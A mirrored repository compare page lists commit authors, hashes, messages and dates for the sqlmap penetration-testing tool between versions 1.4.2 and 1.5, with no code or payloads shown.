PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-06 20:51:31 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.4.2
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
...
compare: PenTest:1.5
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

313 Commits
1.4.2 ... 1.5

Author SHA1 Message Date
Miroslav Stampar
0207ecf0ee Version bump (1.5) 2021-01-03 15:23:40 +01:00
Miroslav Stampar
ae6a812ee1 Trivial updates 2020-12-31 12:38:57 +01:00
Miroslav Stampar
f23c04131c Patch of a patch 2020-12-31 12:17:08 +01:00
Miroslav Stampar
ab0df2a85c Fixes #4503 2020-12-31 12:09:15 +01:00
Miroslav Stampar
2cf2dd9a2c Fixes #4502 2020-12-31 12:00:13 +01:00
Miroslav Stampar
82e28e038e Another year bump 2020-12-31 11:49:19 +01:00
Miroslav Stampar
31fe3453a2 Copyright year bump 2020-12-31 11:46:27 +01:00
Miroslav Stampar
32deef59c3 Fixes #4499 2020-12-28 19:09:31 +01:00
Miroslav Stampar
8142dd8f3b Minor update 2020-12-28 15:39:01 +01:00
Miroslav Stampar
1b2ac3069d Implementing --proxy-freq (Issue #4496) 2020-12-26 23:04:48 +01:00
Miroslav Stampar
bb02eefb70 Fixes #4495 2020-12-26 00:49:42 +01:00
Miroslav Stampar
8c8aae9170 Fixes #4492 2020-12-25 23:24:59 +01:00
Miroslav Stampar
99e6d56f09 Fixes #4494 2020-12-25 22:55:19 +01:00
Miroslav Stampar
41e247be56 Another trivial update 2020-12-22 21:40:15 +01:00
Miroslav Stampar
81602c4093 Another minor update 2020-12-22 21:35:02 +01:00
Miroslav Stampar
31c597f9e6 Minor update 2020-12-22 21:30:12 +01:00
Miroslav Stampar
b039c35f2b Fixes #4479 2020-12-18 12:38:15 +01:00
Miroslav Stampar
bae7766e64 Support patch for #4486 2020-12-18 12:13:07 +01:00
Miroslav Stampar
9c95445723 Trivial update (drei nagging) 2020-12-18 12:01:49 +01:00
Miroslav Stampar
eeffcfe1b6 Periodic recloaking (AV) 2020-12-18 11:57:13 +01:00
Miroslav Stampar
809538d1bb Trivial update 2020-12-18 11:38:54 +01:00
Miroslav Stampar
5f743ab19b Fixes #4480 2020-12-17 13:50:33 +01:00
Miroslav Stampar
85c6d0d5c1 Fixes #4483 2020-12-17 13:34:23 +01:00
Miroslav Stampar
d9e6e678e8 Fixes #4470 2020-12-10 23:05:19 +01:00
Miroslav Stampar
7e675fed9f Fixes #4471 2020-12-10 22:47:29 +01:00
Miroslav Stampar
5bf52c3f9c Trivial patches 2020-12-10 14:22:44 +01:00
Miroslav Stampar
94709c93bb Minor update 2020-12-10 13:56:25 +01:00
Miroslav Stampar
a852d25314 Trying smth 2020-12-10 11:27:37 +01:00
Miroslav Stampar
c0aa8565a1 Update of banner regexes 2020-12-08 14:41:19 +01:00
Miroslav Stampar
bce1cfe00f Minor update 2020-12-08 13:40:46 +01:00
Miroslav Stampar
0cd6285707 Long live the Python2 2020-12-07 21:30:18 +01:00
Miroslav Stampar
8a783702d9 Fixes #4464 2020-12-07 12:28:49 +01:00
Miroslav Stampar
760563dbd1 Patch for #4451 2020-12-07 12:00:10 +01:00
Miroslav Stampar
92054b5d63 Fixes #4465,#4466,#4468,#4469 2020-12-07 11:42:46 +01:00
Miroslav Stampar
2f3801b808 Minor leftover 2020-12-07 11:23:11 +01:00
Miroslav Stampar
d5c9bdf279 Patch for #4467 2020-12-07 11:22:34 +01:00
Miroslav Stampar
12158af6ca Fixes #4457 2020-12-04 12:28:13 +01:00
tomjshore
8e662a5179 Changed get logs to hanndle ints correctly (#4460) 2020-12-04 11:47:09 +01:00
Miroslav Stampar
8d9c84236d Fixes #4458 2020-12-04 11:45:40 +01:00
Miroslav Stampar
815d417a9e Fixes #4462 2020-12-04 11:40:09 +01:00
Miroslav Stampar
3936a11280 Fixes #4450 2020-12-02 22:30:01 +01:00
Miroslav Stampar
13e363155a Fixes #4453 2020-12-02 21:43:11 +01:00
Miroslav Stampar
be0f7a9e07 Update of --beep (including XSS/FI) 2020-12-01 23:10:53 +01:00
Miroslav Stampar
33a8db9596 Minor patch 2020-12-01 22:56:24 +01:00
Miroslav Stampar
9f6eacb4e8 Fixes #4444 2020-12-01 16:36:34 +01:00
Miroslav Stampar
e6d9dc46ab Patch for #4449 2020-12-01 15:56:47 +01:00
Miroslav Stampar
c3e81a6223 Switching EXTRACTVALUE and FLOOR in priority (FLOOR is not working on recent MySQL) 2020-12-01 15:34:49 +01:00
Miroslav Stampar
78ba33737e Patch for known NCHAR/UNION-query SQLi problems 2020-12-01 12:16:15 +01:00
Miroslav Stampar
c6557e2b45 Minor patches 2020-11-30 23:33:08 +01:00
Miroslav Stampar
fa17cfb606 Fixes #4447 2020-11-30 22:25:56 +01:00
Miroslav Stampar
40623e780a Minor patch (--update to work with #pip) 2020-11-27 12:57:16 +01:00
Miroslav Stampar
35862bf4c8 Minor patch 2020-11-27 12:37:56 +01:00
Miroslav Stampar
5d6def425a Trivial cleanup 2020-11-27 12:32:05 +01:00
Miroslav Stampar
7066e7ce97 Trivial update 2020-11-26 23:41:35 +01:00
Miroslav Stampar
8dad7dd12d Trivial update 2020-11-24 14:07:30 +01:00
Miroslav Stampar
6b7c3a2f81 Minor cosmetics 2020-11-20 13:03:15 +01:00
Miroslav Stampar
e9b3af6b9a Minor compatibility patch for 'Copy as cURL' browser feature 2020-11-20 12:52:02 +01:00
Miroslav Stampar
194c911433 Another update for #4367 2020-11-16 11:59:17 +01:00
Miroslav Stampar
e621d7ec6a Fixes #4423 2020-11-16 10:28:53 +01:00
Miroslav Stampar
854507bc85 Potential fix for #4307 2020-11-13 23:00:26 +01:00
Miroslav Stampar
82eec780a2 Update README.md 2020-11-10 22:36:02 +01:00
Miroslav Stampar
de55be3afe Update README.md 2020-11-10 22:10:03 +01:00
Miroslav Stampar
4d2b890a0a Silent bug fix 2020-11-09 23:02:48 +01:00
Miroslav Stampar
c243c5fe0d Implementing --skip-heuristics (#4414) 2020-11-09 22:11:11 +01:00
Miroslav Stampar
a35fc713a2 Minor patch (AS keyword does not play well in nullCastConcatFields) 2020-11-05 11:20:51 +01:00
Miroslav Stampar
97b7dc585c Patch for #4419 2020-11-05 10:59:36 +01:00
Miroslav Stampar
c5a5717add Minor adjustment 2020-11-05 10:12:54 +01:00
Miroslav Stampar
fe4e79511a Fixes #4413 2020-11-02 11:15:45 +01:00
Miroslav Stampar
1d5bde9cdf Implementing --live-cookies (Issue #4401) 2020-10-29 13:51:11 +01:00
Miroslav Stampar
227a23f091 Fixes #4408 2020-10-29 12:33:12 +01:00
Miroslav Stampar
0ff3b1ce70 Implemented FOR JSON AUTO in MsSQL 2020-10-28 16:48:11 +01:00
Miroslav Stampar
7e483ffd7a Adding minor note 2020-10-28 14:38:13 +01:00
Miroslav Stampar
a5852390f7 Implements ARRAY_AGG for PostgreSQL 2020-10-28 14:36:25 +01:00
Miroslav Stampar
73d0c67a80 Implements #4407 2020-10-28 12:57:25 +01:00
Miroslav Stampar
8e9f7e90c3 Fixes #4404 2020-10-27 15:12:42 +01:00
Miroslav Stampar
f6bf331b8f Minor cosmetics 2020-10-27 14:57:12 +01:00
Miroslav Stampar
585645e806 Implements #4403 2020-10-27 14:06:56 +01:00
Miroslav Stampar
673a5afe07 Fixes #4400 2020-10-26 11:21:29 +01:00
Miroslav Stampar
c9a8b915c8 Fixes #4398 2020-10-25 17:34:06 +01:00
Miroslav Stampar
9645aaa33f Fixes #4399 2020-10-25 17:11:22 +01:00
Miroslav Stampar
e556876fe6 Fixes #4394 2020-10-21 14:58:30 +02:00
Miroslav Stampar
0524670cf9 More generic update for #4199 2020-10-21 14:44:07 +02:00
Miroslav Stampar
96a2c91701 Patch regarding #4199 2020-10-21 14:40:11 +02:00
Miroslav Stampar
5029d67e4f Minor update regarding the #4388 2020-10-20 12:54:22 +02:00
Miroslav Stampar
5af64f5ae4 Minor update 2020-10-20 12:37:07 +02:00
Miroslav Stampar
bc981c517b New vuln-test case 2020-10-15 17:20:32 +02:00
Miroslav Stampar
87ad11dffb Fixes #4383 and #4384 2020-10-15 12:11:21 +02:00
Miroslav Stampar
3663fa936b Fixes #4382 2020-10-14 23:04:01 +02:00
Miroslav Stampar
4687383a44 Patch for multiple-Ctrl-C in multiple-target mode 2020-10-14 12:22:56 +02:00
Miroslav Stampar
62cfd47b83 Minor patch 2020-10-14 11:49:58 +02:00
Miroslav Stampar
2bf22df53a Implementing support for piped input of targets 2020-10-14 11:34:52 +02:00
Miroslav Stampar
0585a55ee0 Trivial refactoring for #4379 2020-10-13 11:05:13 +02:00
tree-chtsec
babe52eb10 HSQLDB write file support (#4379) 
* Make asterisk work with --csrf-token option

* add --file-write support in HSQLDB

Co-authored-by: tree <chtpt@treedeMacBook-Pro.local>
 2020-10-13 10:56:39 +02:00
Miroslav Stampar
231c3da057 Update for #4380 2020-10-13 10:32:09 +02:00
Miroslav Stampar
13a2ab3fa3 Minor update (drei) 2020-10-05 21:36:30 +02:00
Miroslav Stampar
21cc6e3c99 Potential patch for #4367 2020-10-05 12:45:15 +02:00
Miroslav Stampar
a2a73b88ea Fixes #4366 2020-10-05 12:12:06 +02:00
Miroslav Stampar
210a4c3a0a Fixes #4363 2020-10-05 11:35:49 +02:00
Miroslav Stampar
15225668d0 Somebody was fooling around (Issue #4357) 2020-09-28 13:12:59 +02:00
Miroslav Stampar
c1bf36b876 Better alternative 2020-09-24 14:57:45 +02:00
Miroslav Stampar
229f89004b Fixes #4355 2020-09-24 14:55:13 +02:00
Miroslav Stampar
443b1f2ed5 ORDER BY required 2020-09-24 14:54:59 +02:00
Miroslav Stampar
60f4520020 Minor update for #4353 2020-09-23 15:29:28 +02:00
Miroslav Stampar
7460b87f1d Update for #4353 2020-09-23 15:22:07 +02:00
Miroslav Stampar
5d08b9004e Minor update 2020-09-21 17:11:11 +02:00
Miroslav Stampar
c2b9e539ae Update for #4351 2020-09-21 17:04:54 +02:00
HerendraTJ
3d8eb62a59 Issue Tracker --> Pelacak Masalah. (#4347) 2020-09-18 11:58:29 +02:00
Miroslav Stampar
d51e45fd34 Minor update for #4344 2020-09-17 15:26:06 +02:00
Miroslav Stampar
3258e29cf9 Update for #4344 2020-09-17 15:22:50 +02:00
antichown
e0ea1ab5e9 new tamper script (#4344) 
* new tamper script

works with time-based queries

* Update sleepgetlock.py

Co-authored-by: Miroslav Stampar <miroslav@sqlmap.org>
 2020-09-17 15:06:47 +02:00
Miroslav Stampar
192ca02c41 Minor update (more intuitive) 2020-09-16 14:28:32 +02:00
Miroslav Stampar
f0bbbb0918 Fixes #4341 2020-09-11 16:28:10 +02:00
Miroslav Stampar
f6857d4ee4 Bug fix (304 not modified as original response) 2020-09-11 14:32:25 +02:00
Miroslav Stampar
a1342e04a5 Minor update 2020-09-10 16:34:01 +02:00
Miroslav Stampar
7963281c41 Minor update 2020-09-10 16:20:12 +02:00
Miroslav Stampar
715063f0d4 Patching session PY2<->PY3 incompatibility issue 2020-09-09 16:15:23 +02:00
Miroslav Stampar
1658331810 Trivial update 2020-09-09 14:07:13 +02:00
Miroslav Stampar
bfe93e20c5 Patch for #4337 2020-09-09 13:58:26 +02:00
Miroslav Stampar
bcea050f22 Fixes #4331 2020-09-06 23:32:47 +02:00
Miroslav Stampar
c4a692abe3 Patch for #4332 2020-09-06 23:21:12 +02:00
Miroslav Stampar
b42b62ae38 Major improvement in Base64 handling (late-binding) 2020-09-04 13:16:50 +02:00
Miroslav Stampar
a7f20c1d67 Minor update (base64 stuff) 2020-09-04 12:45:33 +02:00
Miroslav Stampar
f781367ac1 Fixes #4328 2020-09-04 10:49:17 +02:00
mkauschi
1bec3a953c fix #4325 (#4327) 
Co-authored-by: manuel <manuel@crashtest-security.com>
 2020-09-02 17:07:28 +02:00
Miroslav Stampar
66e07dfab6 Fixes #4322 2020-09-01 15:35:14 +02:00
Miroslav Stampar
226d467f6d Fixes #4321 2020-08-31 22:06:22 +02:00
Miroslav Stampar
ea5ae44b6c Minor improvement 2020-08-31 11:55:14 +02:00
Miroslav Stampar
95b9a47c6f Adding support for easier 'decloaking' (AV something something) 2020-08-31 11:34:12 +02:00
Miroslav Stampar
e05f65628d Minor update 2020-08-31 11:18:29 +02:00
Miroslav Stampar
609545176f Minor refactoring 2020-08-28 14:46:59 +02:00
Miroslav Stampar
8de4820b24 Minor update 2020-08-28 14:24:43 +02:00
Miroslav Stampar
df5fabbbbb Adding couple of doctests 2020-08-24 11:10:13 +02:00
Miroslav Stampar
0c48d0dbec Minor update on request 2020-08-23 22:11:24 +02:00
Miroslav Stampar
5108c2d06c Minor update regarding #4312 2020-08-23 21:16:56 +02:00
Miroslav Stampar
603d602550 Fixes #4313 2020-08-23 20:59:10 +02:00
Miroslav Stampar
907786edb8 Patch for #4314 2020-08-23 20:56:22 +02:00
Miroslav Stampar
85b73f872e Minor patch 2020-08-20 13:54:52 +02:00
Miroslav Stampar
a42ec7d9cb Trivial refactoring 2020-08-13 16:22:09 +02:00
tree-chtsec
b3f4c6d0fc Make asterisk work with --csrf-token option (#4305) 2020-08-13 16:18:31 +02:00
Miroslav Stampar
cec65f3a27 Adding new tamper script 2020-08-12 09:50:04 +02:00
Miroslav Stampar
cc79ae69aa Fixes #4303 2020-08-11 15:09:23 +02:00
Miroslav Stampar
5a9dc15cf2 Introduction of --base64-safe 2020-08-10 22:26:03 +02:00
Miroslav Stampar
f1fd080ba5 Minor improvement 2020-08-10 21:54:58 +02:00
Miroslav Stampar
cfe9fb4f5b Fixes #4301 2020-08-10 21:27:38 +02:00
Miroslav Stampar
7a55c9c145 Trivial update 2020-08-10 21:26:37 +02:00
Miroslav Stampar
4077a359f4 Fixes #4294 2020-08-05 22:43:32 +02:00
Miroslav Stampar
435fd49f1d Trivial update 2020-08-04 10:34:18 +02:00
Miroslav Stampar
bcfd9c3f48 Trivial update 2020-08-04 10:27:52 +02:00
Miroslav Stampar
39c320c29b Fixes #4292 2020-08-03 23:23:14 +02:00
Miroslav Stampar
b719b9612f Adding new tamper script 2020-07-29 13:40:23 +02:00
Miroslav Stampar
84bc2640d1 Minor adjustment on private request 2020-07-28 12:55:57 +02:00
Miroslav Stampar
fced29a242 Fixes #4285 2020-07-28 11:30:47 +02:00
Miroslav Stampar
2e5e958d3f Fixes #4287 2020-07-28 11:22:05 +02:00
Miroslav Stampar
1e30471d3d Minor update 2020-07-28 11:10:15 +02:00
Miroslav Stampar
10b93d753d Adding new tamper script 2020-07-27 14:01:12 +02:00
Miroslav Stampar
1280abc25c Adding some tamper scripts 2020-07-27 13:49:48 +02:00
Miroslav Stampar
c47061f25d Update regarding #4281 2020-07-26 20:16:58 +02:00
HerendraTJ
9b871f1093 Spacing (#4279) 
Add spacing Basisdata --> Basis data because two words is 100% different in Indonesia language.
 2020-07-26 20:06:59 +02:00
Miroslav Stampar
0ba07e93d5 Fixes #4284 2020-07-26 19:34:30 +02:00
Miroslav Stampar
ce50acf69d Minor update 2020-07-22 11:25:06 +02:00
Miroslav Stampar
9f0ff27c26 Fixes #4277 2020-07-22 09:57:13 +02:00
Miroslav Stampar
ecafac5cd2 Minor cleanup 2020-07-21 22:05:02 +02:00
Miroslav Stampar
f39869992c Fixes #4275 2020-07-20 12:43:17 +02:00
Miroslav Stampar
e910fc6b8b Some more things regarding #4269 2020-07-16 16:10:13 +02:00
Gustavo
6375f9e506 Fixing an error (#4267) 
There was a newline breaking the link:

"[aqui]
(https://github.com/sqlmapproject/sqlmap/tarball/master)"
 2020-07-16 14:45:17 +02:00
Miroslav Stampar
8e649dc3f7 Minor patch 2020-07-16 14:42:51 +02:00
Miroslav Stampar
a6ce91a3e2 Fixes #4269 2020-07-16 14:30:50 +02:00
Miroslav Stampar
408862b040 Update regarding #4268 2020-07-16 14:22:32 +02:00
Miroslav Stampar
fc4dec7291 Fixes #4260 2020-07-15 15:29:35 +02:00
Miroslav Stampar
274a6e62da Patch for #4261 2020-07-15 14:53:35 +02:00
Miroslav Stampar
aa7c548376 Fixes #4263 2020-07-15 14:49:16 +02:00
Miroslav Stampar
6b7a1dfd94 Adding new payload (credits: blackfan.ru) 2020-07-10 14:33:45 +02:00
Miroslav Stampar
67f918f6ad Minor update 2020-07-07 11:31:07 +02:00
Miroslav Stampar
a65e1faf99 Patch for #4258 2020-07-07 10:41:23 +02:00
Miroslav Stampar
ff48e1d820 Minor update (phpass) 2020-07-01 13:04:44 +02:00
Miroslav Stampar
0094f02fb0 Adding support for generic phpass (Wordpress, Drupal, PHPBB3, etc.) (Issue #4252) 2020-07-01 12:46:26 +02:00
Miroslav Stampar
459130196a Minor patch 2020-07-01 11:56:24 +02:00
Miroslav Stampar
0a8a65bc0b Update regarding #4248 2020-06-29 20:29:46 +02:00
Miroslav Stampar
5d370f2fa1 Update regarding the #4243 2020-06-26 11:45:05 +02:00
Miroslav Stampar
1296336e18 Minor cleanup 2020-06-25 15:13:35 +02:00
Miroslav Stampar
75b3736467 Re-implementation for #4243 2020-06-25 15:07:19 +02:00
Miroslav Stampar
282eb7e533 Minor update related to the #4244 2020-06-25 13:48:50 +02:00
Miroslav Stampar
f28d82c119 Minor patch related to the #4239 2020-06-25 13:02:56 +02:00
Miroslav Stampar
74603c5530 Fixes #4239 2020-06-25 12:55:10 +02:00
Miroslav Stampar
050700f079 Fixes #4237 2020-06-24 12:05:40 +02:00
Miroslav Stampar
31bf1fc6b6 Update regarding #4239 2020-06-24 11:41:51 +02:00
Miroslav Stampar
d4d83b29f0 Drei patch (Issue #4235) 2020-06-17 21:58:10 +02:00
Miroslav Stampar
596fff48ad Fixes #4235 2020-06-17 20:56:50 +02:00
Miroslav Stampar
56ff081314 Up the ante 2020-06-17 20:05:12 +02:00
Miroslav Stampar
69421b4806 Fixes #4231 2020-06-14 22:12:00 +02:00
Miroslav Stampar
3910b86853 Potential patch for #4232 2020-06-14 22:01:49 +02:00
Miroslav Stampar
bbdedb39f9 Fixes #4233 2020-06-14 21:23:55 +02:00
Miroslav Stampar
d0be782ece Update for #4212 2020-06-10 12:53:22 +02:00
Miroslav Stampar
16c8673e98 Implementation on request (--csrf-retries) 2020-06-10 12:49:35 +02:00
Miroslav Stampar
1dedc36d85 Implementation for #4212 2020-06-10 12:19:52 +02:00
Miroslav Stampar
c1d46c95ed Minor correction 2020-06-10 11:53:58 +02:00
Miroslav Stampar
d5fc2c9350 Patch for #4227 2020-06-05 17:37:36 +02:00
Miroslav Stampar
c28ad8fcd8 Adding boundary for #4221 2020-06-05 17:32:41 +02:00
Miroslav Stampar
2d06543cac Fixes #4220 2020-06-01 03:29:53 +02:00
Miroslav Stampar
6a1e0fb497 Travis CI patch (no more --check-internet) 2020-05-27 18:39:48 +02:00
Miroslav Stampar
5c650e15a9 Still debugging Travis CI issue 2020-05-27 18:30:13 +02:00
Miroslav Stampar
c97a814d26 Trying to deal with Travis CI problem 2020-05-27 17:57:38 +02:00
Miroslav Stampar
a58d08c7e4 Removing deprecated option 2020-05-27 16:50:16 +02:00
Miroslav Stampar
9c503873ad Minor patch (TravisCI related) 2020-05-27 15:44:44 +02:00
Miroslav Stampar
03dfd6b4d5 Fixes #4214 2020-05-27 15:39:03 +02:00
Miroslav Stampar
d5a2ffc8ce Patch for Issue #4211 2020-05-21 22:32:16 +02:00
Miroslav Stampar
ddf8b1b198 Fixes #4208 2020-05-20 16:12:19 +02:00
Karim Kanso
9a36357c52 SQLite table dumping compatibility improvements. (#4205) 
* Fix sqlite regex for create table to support implicit column types

* Fix sqlite when dumping large tables
 2020-05-20 15:35:20 +02:00
Miroslav Stampar
667e4d00f2 Fixes #4204 2020-05-20 15:20:44 +02:00
Miroslav Stampar
788dcbf077 Update of THANKS file 2020-05-20 15:04:31 +02:00
Miroslav Stampar
a851dc486a Couple of trivialities 2020-05-15 12:58:03 +02:00
Miroslav Stampar
9077734ec5 Minor update related to last couple of commits 2020-05-14 19:20:16 +02:00
Miroslav Stampar
7b49c46906 Commit as a thank you for the donation 2020-05-14 17:48:07 +02:00
Miroslav Stampar
317bc0f69c Trivial text update 2020-05-14 17:17:34 +02:00
Miroslav Stampar
c7bdf27542 Tribute to all the FUBAR h4x0rs around the world (#4183) 2020-05-14 17:15:33 +02:00
Miroslav Stampar
b334b6b742 Patch for #4199 2020-05-13 14:18:19 +02:00
Miroslav Stampar
aa812effe7 Fixes #4203 2020-05-13 13:45:52 +02:00
Miroslav Stampar
99e2a26a8d Fixes #4202 2020-05-13 12:53:58 +02:00
Miroslav Stampar
01edcbf71d Minor patch (proper exit code-ing) 2020-05-13 12:39:37 +02:00
Miroslav Stampar
0b93311ef2 Fixes #4201 2020-05-13 11:59:59 +02:00
Miroslav Stampar
4f3f43d8bb Further update for #4198 2020-05-11 17:55:48 +02:00
Miroslav Stampar
4582948aac Update regarding #4198 2020-05-11 12:38:54 +02:00
Miroslav Stampar
3729b76c14 Fixes #4194 2020-05-11 11:31:36 +02:00
Miroslav Stampar
a8c3d17583 Fixes #4197 2020-05-11 11:13:06 +02:00
Miroslav Stampar
3c36b186ad Mixing some fresh blood (PwnedPasswordTop100k) 2020-05-06 13:28:13 +02:00
Miroslav Stampar
075fa1d4be Minor improvement (bz2 slow, zlib fast) 2020-05-06 13:18:19 +02:00
Miroslav Stampar
5be407edad Patch related to the #4188 2020-05-06 00:36:18 +02:00
Miroslav Stampar
7ab82de80f Minor update (usage of cookie in --eval) 2020-05-05 23:57:15 +02:00
Miroslav Stampar
93399ab1b3 Cleaning of leftover parameter values 2020-05-05 23:50:45 +02:00
Miroslav Stampar
87bccf4aa7 Patch related to the #4187 2020-05-05 23:40:37 +02:00
Miroslav Stampar
1c179674d8 Minor patching (--not-string related) 2020-05-05 13:31:44 +02:00
Miroslav Stampar
7a6433b9ef Proper implementation for #4184 2020-05-04 12:25:46 +02:00
Miroslav Stampar
4e7f0b10d5 Patch related to the #4185 2020-05-04 10:45:39 +02:00
Miroslav Stampar
0351b4a939 Minor patch (CTF related) 2020-05-04 00:06:03 +02:00
Miroslav Stampar
3c93872d53 Update related to the #4182 2020-05-02 13:59:06 +02:00
Miroslav Stampar
881d767df8 Fixes #4181 2020-04-30 16:20:57 +02:00
Miroslav Stampar
1156b53eee Patch for #4178 2020-04-29 14:36:11 +02:00
Miroslav Stampar
5cacf20eb5 Speeding up the post-processing of large dumps 2020-04-27 14:23:47 +02:00
Miroslav Stampar
1825390951 Feeding the OCD 2020-04-26 15:35:34 +02:00
Miroslav Stampar
7815f88027 Patch for #4171 2020-04-26 15:34:27 +02:00
Miroslav Stampar
f63a92a272 Another minor patch related to the #4167 2020-04-21 01:26:28 +02:00
Miroslav Stampar
e3b3dea46c Patch related to the #4167 2020-04-21 01:21:50 +02:00
Miroslav Stampar
55595edce2 Fixes #4165 2020-04-17 19:29:36 +02:00
Miroslav Stampar
aaa0c5c6a8 Minor update 2020-04-15 23:32:15 +02:00
Miroslav Stampar
57bb710ae6 Bug fix (CTF and stuff) 2020-04-08 22:40:23 +02:00
Miroslav Stampar
ce9285381d Fixes #4158 2020-04-07 02:07:54 +02:00
Miroslav Stampar
dad4879200 Couple of trivial refactorings 2020-04-03 00:16:38 +02:00
Miroslav Stampar
2cba4e2d78 Minor update 2020-03-26 14:58:58 +01:00
Miroslav Stampar
8ec165d688 Fixes #4144 2020-03-19 11:25:12 +01:00
Miroslav Stampar
492fbae7c5 Fixes #4143 2020-03-18 10:17:58 +01:00
Miroslav Stampar
a8d81a7962 Fixes #4141 2020-03-17 11:10:52 +01:00
Miroslav Stampar
fcb2a6e111 Patch related to the #4137 2020-03-16 17:31:37 +01:00
Miroslav Stampar
2e7333d7c8 Fixes #4133 2020-03-16 16:56:00 +01:00
Miroslav Stampar
5fd2598da0 Fixes #4136 2020-03-12 22:36:12 +01:00
Miroslav Stampar
111201978c Fixes #4131 2020-03-09 10:44:11 +01:00
Miroslav Stampar
41bdb93655 Fixes #4132 2020-03-09 10:30:24 +01:00
Miroslav Stampar
